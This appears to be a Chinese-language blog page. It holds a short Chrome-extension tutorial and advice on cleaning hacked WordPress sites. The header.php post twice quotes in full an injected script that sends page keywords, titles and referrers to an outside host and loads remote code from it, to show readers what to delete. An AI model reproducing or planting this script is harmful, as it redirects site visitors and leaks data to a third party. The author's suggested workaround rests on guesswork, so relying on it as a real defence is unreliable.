目前有些WORDPRESS網站會被駭被轉址到其他網站

目前有些WORDPRESS網站會被轉址到其他網站,找到治標方式。

WP網站路徑 / wp-include / js / jquery / jquery.js

看看最後一行 有沒有很奇怪的 類似 0x88f 之類的,有的話刪除那段

附圖是正常的 jquery.js

%e6%9c%89%e7%84%a1%e5%85%b6%e4%bb%96%e6%80%aa%e7%95%b0

如果不正常 我圈出來的地方 應該會有被轉址的奇怪語法。

 

此部落格 我也是常常被攻擊 ,各種被入侵被轉址,然後再慢慢找原因

所以往後近來看到這網站怪怪的,大概是我又要開始攻防,然後寫下一篇文章的時候了

新手製作chrome 外掛(extension)的教學及注意事項

1.已測試可以用JQUERY (真棒啊!!)

2. 所有的 js 不能跟html 共用一頁,要獨立出一個js

3.CSS 可以跟HTML共用頁面

也就是 CSS+HTML 可以為一頁, 但是任何js 都要用src的方式連結,這很重要!!!

然後有些測試出來怪怪的語法,不訪查詢原生chrome的語法,然後採用原生chrome的語法代替

以下範例 :

var _text=’http://www.goods-design.com.tw’;
for (var i = 0;  i < 5 ; i++) {
window.open(_text ,’_blank’); //用這個在chrome ex會有極限2個
}

用上述方式實際測試只會開啟2個tab,改用下列方式方可開啟所有tab

for (var i = 0; i < _length; i++) {
chrome.tabs.create({ url: _text }); //要用原生chorme的語法
};

你的WP的header.php也被駭了嗎,提供一個治標解決方式

你的WP的header.php也被駭了嗎? “高興"提供一個治標解決方式。

症狀如下

類似這段程式碼,會出現在theme裡面的header.php裡頭的</head>前面

<script>var a=";setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!=="||document.referrer!==null){document.write(‘<script type="text/javascript" src="http://eurotredeshop.org/js/jquery.min.php?c_utt=G91825&c_utm=’+encodeURIComponent(‘http://eurotredeshop.org/js/jquery.min.php’+’?’+’default_keyword=’+encodeURIComponent(((k=(function(){var keywords=";var metas=document.getElementsByTagName(‘meta’);if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!=="?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?":t:v[1]:k))+’&se_referrer=’+encodeURIComponent(document.referrer)+’&source=’+encodeURIComponent(window.location.host))+'"><‘+’/script>’);}</script>

fuckcode

 

OK,你被駭了!, 然後,一般我們遇到就是進去刪除這段code,但很不幸的3天後,又被放置類似的code進來的,怎麼駭進來的,我不知道詳情,我基本不是wp超級資安專家,只是一個wp使用者,而且你會被客戶說,

為何我的網站在google上出現這個網站可能已遭入侵 “

hack

 

google會幫你偵測 你的網站被入侵了,其實蠻貼心的。

我知道你們不想聽我屁話這麼多,那馬上來看看怎麼[治標]吧,目前已經快一個月都沒再被入侵植入程式碼了

 

STEP1  先刪除被植入的那段code

把 theme裡你使用的主題的header.php 打開來 並刪除可疑code

先刪除</head>前面的這段code

<script>var a=";setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!=="||document.referrer!==null){document.write(‘<script type="text/javascript" src="http://eurotredeshop.org/js/jquery.min.php?c_utt=G91825&c_utm=’+encodeURIComponent(‘http://eurotredeshop.org/js/jquery.min.php’+’?’+’default_keyword=’+encodeURIComponent(((k=(function(){var keywords=";var metas=document.getElementsByTagName(‘meta’);if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!=="?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?":t:v[1]:k))+’&se_referrer=’+encodeURIComponent(document.referrer)+’&source=’+encodeURIComponent(window.location.host))+'"><‘+’/script>’);}</script>

 

STEP2  剪下剩餘的原始乾淨code

刪除可疑code後,剪下剩餘的原有程式碼
(注意: 是將惡意code刪除後,剩餘的乾淨原有code唷)
(注意: 是將惡意code刪除後,剩餘的乾淨原有code唷)
(注意: 是將惡意code刪除後,剩餘的乾淨原有code唷)

一定要把惡意的<script>var a=";setTimeout(10)………………….</script>刪除唷然後你會剩下你原有乾淨的code

 

STEP3 做一個空白檔案 head-include.php

做成一個空白檔案叫做 head-include.php

空白1

把剛剛剪下的程式碼(原本在header.php的乾淨的code) 在空白的head-include.php全部貼上

貼上2

 

STEP4  header.php只留一行程式

這時候header.php會是空白的,來寫一段php簡單程式碼吧

<?php include(‘head-include.php’); ?>

in

 

DONE !!!

 

再來看看運作上有沒有問題,理論上應該都是正常運作的,

那為什麼這樣可行呢?

我的推測是 :  駭客已經破解wp(目前更新到最新4.5.2還是有被破解過)核心,就是衝得進去你家,然後是用程式碼判斷你主題theme裡有沒有header.php這個檔案,有的話會去找到你的</head>,然後緊接在</head>前面植入a=";setTimeout(10);if(…………… 這段惡意code。

因為工作繁忙沒有時間真正研究如何防禦及理論,還請其他大大補充囉

提供給遇到且想試看看的人

轉載請告知,並於轉載文中附原文連結,謝謝。

高興

studio.goods@gmail.com